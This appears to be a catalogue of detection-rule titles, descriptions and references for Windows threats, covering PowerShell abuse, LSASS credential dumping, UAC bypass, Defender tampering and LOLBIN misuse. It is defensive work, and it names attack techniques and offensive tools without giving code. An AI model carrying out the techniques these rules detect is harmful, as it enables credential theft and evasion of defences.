Potential Keylogger Activity Detects PowerShell scripts that contains reference to keystroke capturing functions https://twitter.com/ScumBots/status/1610626724257046529, https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content, https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content, https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0
Suspicious Get Local Groups Information - PowerShell Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
Potential Suspicious PowerShell Keywords Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462, https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1, https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1, https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7
Powershell Local Email Collection Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a users local system, such as Outlook storage or cache files. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md
PowerShell Deleted Mounted Share Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md
Suspicious Mount-DiskImage Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image, https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps
Suspicious Connection to Remote Account Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos
Suspicious New-PSDrive to Admin Share Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2
Suspicious TCP Tunnel Via PowerShell Script Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1
Recon Information for Export with PowerShell Once established within a system or network, an adversary may use automated techniques for collecting internal data https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md
Remove Account From Domain Admin Group Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group
Suspicious Service DACL Modification Via Set-Service Cmdlet - PS Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) https://twitter.com/Alh4zr3d/status/1580925761996828672, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2
Suspicious Get Information for SMB Share Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md
Potential PowerShell Obfuscation Using Alias Cmdlets Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts https://github.com/1337Rin/Swag-PSO
Suspicious SSL Connection Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2, https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
Suspicious Start-Process PassThru Powershell use PassThru option to start in background https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7
Suspicious Unblock-File Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2
Powershell Suspicious Win32_PnPEntity Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md
Replace Desktop Wallpaper by Powershell An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md
Delete Volume Shadow Copies via WMI with PowerShell - PS Script Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell
Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html
Suspicious PowerShell WindowStyle Option Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md
PowerShell Write-EventLog Usage Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/
Zip A Folder With PowerShell For Staging In Temp - PowerShell Script Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
SyncAppvPublishingServer Execution to Bypass Powershell Restriction Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088
Tamper Windows Defender - ScriptBlockLogging Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps, https://bidouillesecurity.com/disable-windows-defender-in-powershell/
Testing Usage of Uncommonly Used Port Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell, https://learn.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps
Powershell Timestomp Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md, https://www.offensive-security.com/metasploit-unleashed/timestomp/
Powershell Token Obfuscation - Powershell Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation
User Discovery And Export Via Get-ADUser Cmdlet - PowerShell Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
Potential Persistence Via PowerShell User Profile Using Add-Content Detects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md
Abuse of Service Permissions to Hide Services Via Set-Service - PS Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) https://twitter.com/Alh4zr3d/status/1580925761996828672, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2
Veeam Backup Servers Credential Dumping Script Execution Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" class, in order to dump stored credentials. https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/, https://labs.withsecure.com/publications/fin7-target-veeam-servers
Usage Of Web Request Commands And Cmdlets - ScriptBlock Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/, https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)
PowerShell WMI Win32_Product Install MSI Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
Windows Firewall Profile Disabled Detects when a user disables the Windows Firewall via a Profile to help evade defense. https://learn.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2022-ps, https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell, https://web.archive.org/web/20230929023836/http://powershellhelp.space/commands/set-netfirewallrule-psv5.php, http://woshub.com/manage-windows-firewall-powershell/, https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html
Winlogon Helper DLL Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md
Potential WinAPI Calls Via PowerShell Scripts Detects use of WinAPI functions in PowerShell scripts https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Windows Defender Exclusions Added - PowerShell Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html
WMImplant Hack Tool Detects parameters used by WMImplant https://github.com/FortyNorthSecurity/WMImplant
Powershell WMI Persistence Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545
WMIC Unquoted Services Path Lookup - PowerShell Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py, https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Suspicious X509Enrollment - Ps Script Detect use of X509Enrollment https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41, https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115
Powershell XML Execute Command Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests
CMSTP Execution Process Access Detects various indicators of Microsoft Connection Manager Profile Installer execution https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
HackTool - CobaltStrike BOF Injection Pattern Detects a typical pattern of a CobaltStrike BOF which inject into other processes https://github.com/boku7/injectAmsiBypass, https://github.com/boku7/spawn
HackTool - Generic Process Access Detects process access requests from hacktool processes based on their default image name https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158, https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html
HackTool - LittleCorporal Generated Maldoc Injection Detects the process injection of a LittleCorporal generated Maldoc. https://github.com/connormcgarr/LittleCorporal
HackTool - HandleKatz Duplicating LSASS Handle Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles https://github.com/codewhitesec/HandleKatz
Lsass Memory Dump via Comsvcs DLL Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. https://twitter.com/shantanukhande/status/1229348874298388484, https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
HackTool - SysmonEnte Execution Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html, https://github.com/codewhitesec/SysmonEnte/, https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png
LSASS Memory Access by Tool With Dump Keyword In Name Detects LSASS process access requests from a source process with the "dump" keyword in its image name. https://twitter.com/_xpn_/status/1491557187168178176, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz
Potential Credential Dumping Activity Via LSASS Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature. https://web.archive.org/web/20230329170326/https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md, https://research.splunk.com/endpoint/windows_possible_credential_dumping/
Credential Dumping Activity By Python Based Tool Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz. https://twitter.com/bh4b3sh/status/1303674603819081728, https://github.com/skelsec/pypykatz
Remote LSASS Process Access Through Windows Remote Management Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz. https://pentestlab.blog/2018/05/15/lateral-movement-winrm/
Suspicious LSASS Access Via MalSecLogon Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right. https://twitter.com/SBousseaden/status/1541920424635912196, https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml, https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html
Potentially Suspicious GrantedAccess Flags On LSASS Detects process access requests to LSASS process with potentially suspicious access flags https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights, https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
Credential Dumping Attempt Via WerFault Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up. https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507
LSASS Access From Potentially White-Listed Processes Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference https://twitter.com/_xpn_/status/1491557187168178176, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz, https://twitter.com/mrd0x/status/1460597833917251595
Uncommon Process Access Rights For Target Image Detects process access request to uncommon target images with a "PROCESS_ALL_ACCESS" access mask. https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
Potential Direct Syscall of NtOpenProcess Detects potential calls to NtOpenProcess directly from NTDLL. https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6
Credential Dumping Attempt Via Svchost Detects when a process tries to access the memory of svchost to potentially dump credentials. Internal Research
Suspicious Svchost Process Access Detects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service. https://github.com/hlldz/Invoke-Phant0m, https://twitter.com/timbmsft/status/900724491076214784
Function Call From Undocumented COM Interface EditionUpgradeManager Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables. https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/, https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611
UAC Bypass Using WOW64 Logger DLL Hijack Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30) https://github.com/hfiref0x/UACME
Compress Data and Lock With Password for Exfiltration With 7-ZIP An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
7Zip Compressing Dump Files Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. https://thedfirreport.com/2022/09/26/bumblebee-round-two/
Potential DLL Injection Via AccCheckConsole Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc. The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility. https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340, https://twitter.com/bohops/status/1477717351017680899?s=12, https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/
Suspicious AddinUtil.EXE CommandLine Execution Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
Uncommon Child Process Of AddinUtil.EXE Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload. https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
Uncommon AddinUtil.EXE CommandLine Execution Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
AddinUtil.EXE Execution From Uncommon Directory Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
Potential Adplus.EXE Abuse Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/, https://twitter.com/nas_bench/status/1534916659676422152, https://twitter.com/nas_bench/status/1534915321856917506
AgentExecutor PowerShell Execution Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument https://twitter.com/lefterispan/status/1286259016436514816, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/, https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension, https://twitter.com/jseerden/status/1247985304667066373/photo/1
Suspicious AgentExecutor PowerShell Execution Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument https://twitter.com/lefterispan/status/1286259016436514816, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/, https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension, https://twitter.com/jseerden/status/1247985304667066373/photo/1
Uncommon Child Process Of Appvlp.EXE Detects uncommon child processes of Appvlp.EXE Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/
AspNetCompiler Execution Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/, https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
Suspicious Child Process of AspNetCompiler Detects potentially suspicious child processes of "aspnet_compiler.exe". https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/, https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
Potentially Suspicious ASP.NET Compilation Via AspNetCompiler Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation. https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/, https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
Uncommon Assistive Technology Applications Execution Via AtBroker.EXE Detects the start of a non built-in assistive technology applications via "Atbroker.EXE". http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/, https://lolbas-project.github.io/lolbas/Binaries/Atbroker/
Hiding Files with Attrib.exe Detects usage of attrib.exe to hide files from users. https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/, https://www.uptycs.com/blog/lolbins-are-no-laughing-matter
Set Suspicious Files as System Files Using Attrib.EXE Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4, https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0, https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/
Interactive AT Job Detects an interactive AT job, which may be used as a form of privilege escalation. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md, https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html
Audit Policy Tampering Via NT Resource Kit Auditpol Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol
Audit Policy Tampering Via Auditpol Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
Indirect Inline Command Execution Via Bash.EXE Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. https://lolbas-project.github.io/lolbas/Binaries/Bash/
Indirect Command Execution From Script File Via Bash.EXE Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. https://lolbas-project.github.io/lolbas/Binaries/Bash/, https://linux.die.net/man/1/bash, Internal Research
Boot Configuration Tampering Via Bcdedit.EXE Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md, https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html
Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE Detects potential malicious and unauthorized usage of bcdedit.exe https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set, https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2
Data Export From MSSQL Table Via BCP.EXE Detects the execution of the BCP utility in order to export data from the database. Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file. https://docs.microsoft.com/en-us/sql/tools/bcp-utility, https://asec.ahnlab.com/en/61000/, https://asec.ahnlab.com/en/78944/, https://www.huntress.com/blog/attacking-mssql-servers, https://www.huntress.com/blog/attacking-mssql-servers-pt-ii, https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/, https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/
Suspicious Child Process Of BgInfo.EXE Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/, https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
